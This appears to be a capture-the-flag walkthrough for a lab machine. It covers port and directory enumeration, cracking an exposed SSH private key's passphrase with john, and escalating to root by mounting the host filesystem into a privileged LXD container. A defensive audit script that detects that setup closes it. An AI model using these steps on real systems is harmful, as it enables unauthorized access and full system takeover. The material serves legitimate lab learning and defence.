Gaming Server

Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (-Pn) so that nmap skips host discovery:

nmap -Pn 10.10.9.5

Detailed nmap scan:

Command breakdown:

  • (-sV): Service version detection

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 22,80

  • (-oN nmap): Saving the normal output to a file called nmap

nmap -sV -sC -p 22,80 -oN nmap 10.10.9.5

Enumeration

Let's visit the website.

It's a fairly functional website with nothing of interest at first glance, but looking at the page source we see something interesting.

We have a username, John. Let's run gobuster to find hidden directories and pages.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.9.5

We find two directories. The secret directory looks like it has more files, so let's run a gobuster scan against it, this time also looking for php, html and txt files.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.9.5/secret -x php,html,txt

Let's now explore these directories.

The uploads directory looks like a directory containing files that have been uploaded to the web server. Let's download the three files we see here.

wget http://10.10.9.5/uploads/<file-name>

Let's look at the files.

First, the dict.lst file: it looks like a password list. The second file is interesting to read but contains nothing that will help us, and the third file is a meme.

Now let's look at the secret directory.

Let's download this file.

wget http://10.10.9.5/secret/secretKey

Let's read the file.

It's an RSA private key, so let's use ssh2john to recover its passphrase and then log in through SSH.

Exploitation

Let's use ssh2john to extract a crackable hash from the key so that we can use john to recover the passphrase.

/usr/share/john/ssh2john.py secretKey > hash

Now let's crack the passphrase.

john --wordlist=/usr/share/wordlists/rockyou.txt hash

We found the passphrase, so let's log in through SSH. But first there is one step to take: SSH refuses to use a private key whose permissions are too open, so restrict them.

chmod 600 secretKey

And now we can log in.

ssh -i secretKey john@10.10.9.5

We can now read the user.txt file.

Privilege Escalation

Let's run the id command, since we cannot run sudo because we do not have john's password.

id

Looking closely we can see that john is a member of the lxd group. lxd is a Linux container manager, and a member of that group can launch a privileged container and mount the host's root filesystem inside it. There is an article on this topic that explains and shows how to escalate privileges to root with the permissions we currently have. I highly recommend reading the article, as they explain it very well.

These are the steps that we have to follow. First we need to download the alpine image builder on our own machine, as I think we can't download files on the victim machine directly; it can be found here.

git clone https://github.com/saghul/lxd-alpine-builder.git

Now change into the directory we just cloned and run build-alpine.

./build-alpine

After running it, a tar.gz file is created. Now we have to transfer this to the victim machine, so let's start an HTTP server on our machine so that we can fetch the file with wget.

python3 -m http.server 8000

Now let's go to the victim machine, change into the tmp folder (we are going to place all temporary files there), and download the file.

wget http://<your-ip>:8000/alpine-v3.13-x86_64-20210607_2042.tar.gz

Now that the image is built, it can be added as an image to LXD. We can do that with this command:

lxc image import alpine-v3.13-x86_64-20210607_2042.tar.gz --alias myimage

Let's check the list of images using this command:

lxc image list

Now we need to use the following commands to escalate privileges to root. They create a privileged container from the image, attach the host's root filesystem to it as a disk device at /mnt/root, start it and open a shell inside it:

lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id

Now you are root inside the container, with the host's filesystem mounted under /mnt/root, and you can read the root flag, which you can find here.
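As an added defender-side check that is not part of the original writeup, the following POSIX shell script audits a host for the two preconditions this escalation relies on: a non-root member of the lxd group, and a container configured with security.privileged=true plus a disk device whose source is the host's /. It assumes lxc is on PATH for the --live mode and that lxc config show prints the YAML keys seen in the commands above; the helper functions take text as input so they can be exercised on constructed samples.

```shell
#!/bin/sh
# Added audit helper for the lxd-group escalation above (not part of the
# original writeup). Flags the two preconditions the technique needs:
# a non-root member of the "lxd" group, and a container that is both
# privileged and has a disk device whose source is the host's "/".
# Assumptions: `lxc` is on PATH when run with --live, and its YAML output
# uses the "security.privileged:" and "source:" keys set in the writeup.

# Print non-root members of the lxd group, one per line.
# Arg 1: text in /etc/group format.
lxd_group_members() {
    printf '%s\n' "$1" | awk -F: '$1 == "lxd" {
        n = split($4, u, ",")
        for (i = 1; i <= n; i++) if (u[i] != "" && u[i] != "root") print u[i]
    }'
}

# Classify one container from its `lxc config show <name>` YAML.
# Arg 1: that YAML text. Prints OK, PRIVILEGED or PRIVILEGED_HOST_ROOT.
# awk is used (not grep -c) so a zero count never yields a non-zero exit.
container_risk() {
    priv=$(printf '%s\n' "$1" | awk '$1 == "security.privileged:" && $2 ~ /^"?true"?$/ { c++ } END { print c + 0 }')
    hostroot=$(printf '%s\n' "$1" | awk '$1 == "source:" && $2 == "/" { c++ } END { print c + 0 }')
    if [ "$priv" -gt 0 ] && [ "$hostroot" -gt 0 ]; then
        echo PRIVILEGED_HOST_ROOT
    elif [ "$priv" -gt 0 ]; then
        echo PRIVILEGED
    else
        echo OK
    fi
}

# Live audit of this host: lxd group members, then every container.
audit_host() {
    echo "lxd group members (non-root):"
    lxd_group_members "$(cat /etc/group)" | sed 's/^/  /'
    echo "containers:"
    lxc list -c n --format csv | while read -r name; do
        [ -n "$name" ] || continue
        echo "  $name: $(container_risk "$(lxc config show "$name")")"
    done
}

if [ "${1:-}" = "--live" ]; then
    audit_host
fi
```

Run it as `sh lxd_audit.sh --live` on the host; any user listed under the lxd group effectively has root, and a PRIVILEGED_HOST_ROOT container is the finished escalation shown above.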
